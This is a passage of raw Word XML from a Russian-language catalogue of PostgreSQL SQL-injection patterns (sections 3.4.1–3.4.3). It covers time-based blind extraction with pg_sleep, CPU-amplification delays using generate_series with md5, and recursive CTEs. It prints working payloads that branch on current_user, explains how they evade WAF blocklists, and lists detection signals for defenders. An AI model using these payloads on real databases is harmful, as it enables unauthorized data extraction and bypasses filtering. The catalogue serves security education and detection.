        </w:rPr>
        <w:t>WaitLatch()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с timeout-ом. Доступна </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> по умолчанию. PG-планировщик не вычисляет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> спекулятивно. Для безопасности атакующий пишет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT 1 FROM pg_sleep(N))</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — явный subquery, гарантированно вычисляемый в runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C6772A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Требования к среде.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Любая версия PG. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> по умолчанию. Latency-канал должен быть наблюдаем. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> либо отключён, либо больше выбранного </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>delay</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.4.4).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D65DEC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Общие сигналы посимвольного extraction — см. 3.3.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADE1482" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Специфичный для time-based:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C576AC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Повторяющийся response latency ~N секунд (3, 5, 10 — типичные значения).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36668E36" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Любое появление </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от application-роли. В application SQL нет ни одного легитимного контекста для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t>: это инструмент для тестирования и для атак. Однозначный сигнал.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176A6C69" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Все поддерживаемые версии PG. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> стабильна с 8.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CDB3DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.4.2, 3.4.3, 3.4.4, 3.3.1, 3.3.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3679F635" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger SQL injection cheat sheet — Time-based blind; HackTricks: PostgreSQL injection — Time based; PostgreSQL Documentation: System Administration Functions — Delaying Execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE72FAF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.4.2 Амплификация через `generate_series`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631D4402" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF, блокирующий слово </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не блокирует CPU-heavy конструкции, дающие сравнимую задержку. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>generate_series(1, N)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> генерирует N строк; если каждую строку прогнать через тяжёлое выражение (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>md5(random())</w:t>
      </w:r>
      <w:r>
        <w:t>), backend будет работать N × (время на строку) секунд.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C6EF3E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Тот же, что 3.4.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED51AA8"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206C5FB2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Амплификация через MD5-расчёт по миллиону строк:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A00022" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT CASE WHEN current_user = 'app_user' THEN (SELECT count(*) FROM generate_series(1, 1000000) AS g(i) WHERE md5(i::text) IS NOT NULL) ELSE 1 END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D321BB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765D8BE6"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current_user = 'app_user' THEN (SELECT count(*) FROM generate_series(1, 1000000) AS g(i) WHERE md5(i::text) IS NOT NULL) ELSE 1 END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCCE9A4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">На типичном PG-сервере миллион </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>md5(i::text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> занимает 1–3 секунды.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392C38C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Канал работает аналогично 3.4.1, но без слова </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в payload. Обходит WAF-фильтры, заточенные на blacklist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WAITFOR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BENCHMARK</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708B2266"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generate_series</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — функция в PG, генерирующая множество строк. Доступна </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> по умолчанию. Каждая итерация выполняет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>md5()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, что даёт стабильную CPU-нагрузку. Отличие от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не нагружает CPU (backend ждёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WaitLatch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>generate_series + md5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нагружает одно ядро на 100%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B3A9C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Любая версия PG. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>generate_series</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>md5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t>. Калибровка количества строк под целевой сервер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B85018D"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generate_series</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — повседневная функция, используется для построения таблиц дат, pivot-запросов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589931EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Специфичный для time-based:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D1151" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>generate_series(1, N)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с N ≥ 100000 от application-роли. Бизнес-логика обычно работает с диапазонами дат.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2DF716" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>count(*) FROM generate_series(...) WHERE md5(...) IS NOT NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — конструкция, не имеющая смысла за пределами амплификации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246CFCB5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Latency-сигнатуры аналогичны 3.4.1, плюс — побочный сигнал CPU-spike в моменты длинных ответов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04276CF2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Все поддерживаемые версии PG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778B3470" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.4.1, 3.4.3, 3.4.4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32679331" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HackTricks: PostgreSQL injection — Time based; PortSwigger SQL injection cheat sheet; PostgreSQL Documentation: Set Returning Functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8684DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.4.3 Рекурсивный CTE как нагрузочный канал</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A3BF65" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH RECURSIVE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> строит результат итеративно. Дочитываемая до миллионов итераций рекурсия даёт ту же CPU-нагрузку, что и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>generate_series</w:t>
      </w:r>
      <w:r>
        <w:t>, но с другой формой payload — обходит более узкие фильтры.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F24682" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Тот же, что 3.4.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A87A147" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Подставляется вместо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>product_id</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1042CF2D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT CASE WHEN current_user = 'app_user' THEN (SELECT count(*) FROM (WITH RECURSIVE r(i) AS (SELECT 1 UNION ALL SELECT i+1 FROM r WHERE i &lt; 1000000) SELECT i FROM r) s) ELSE 1 END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E12B588" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECB077C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, name, price FROM products WHERE id = (SELECT CASE WHEN current_user = 'app_user' THEN (SELECT count(*) FROM (WITH RECURSIVE r(i) AS (SELECT 1 UNION ALL SELECT i+1 FROM r WHERE i &lt; 1000000) SELECT i FROM r) s) ELSE 1 END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEAFB3C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Рекурсия из 1 000 000 итераций даёт задержку 1–3 секунды.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB508CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> То же, что 3.4.1 и 3.4.2 — бинарный oracle по latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1FC922" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PG-реализация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH RECURSIVE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> хранит рабочий набор в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tuplestore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и итерирует, добавляя строки. Без ограничения на размер промежуточного результата каждая итерация добавляет строку. Это документированное поведение, не баг. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH RECURSIVE</w:t>
      </w:r>
      <w:r>
